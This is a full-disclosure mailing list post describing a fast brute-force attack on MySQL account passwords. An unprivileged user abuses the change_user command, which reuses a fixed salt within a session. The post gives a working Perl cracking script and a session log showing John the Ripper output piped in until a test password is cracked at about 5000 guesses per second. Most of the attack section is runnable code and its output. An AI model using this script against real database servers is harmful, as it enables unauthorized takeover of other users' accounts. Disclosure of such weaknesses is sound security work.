[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] MySQL Local/Remote FAST Account Password Cracking



FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks alot like a
minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the
network pretty efficiently.
During Tests it was possible to test 5000 passwords per second over the network.
The method is as follows:

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server).

Below is an example script and an example which uses John the Ripper's
capabilities
to generate passwords.

The passwords "pass" for the user "crackme" is cracked in a matter of seconds.
(about 100000 passwords are tested in 20 seconds)
---
cracking script

use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(
 hostname => '192.168.2.3',
 database => 'test',
 user     => "user",
 password => "secret",
 debug => 0,
);

$crackuser = "crackme";

while(<stdin>) {
chomp;
$currentpass = $_;

$vv = join "\0",
                $crackuser,
                "\x14".
                Net::MySQL::Password->scramble(
                        $currentpass, $mysql->{salt}, 
$mysql->{client_capabilities}
                ) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
}
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

Greetings,

Kingcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/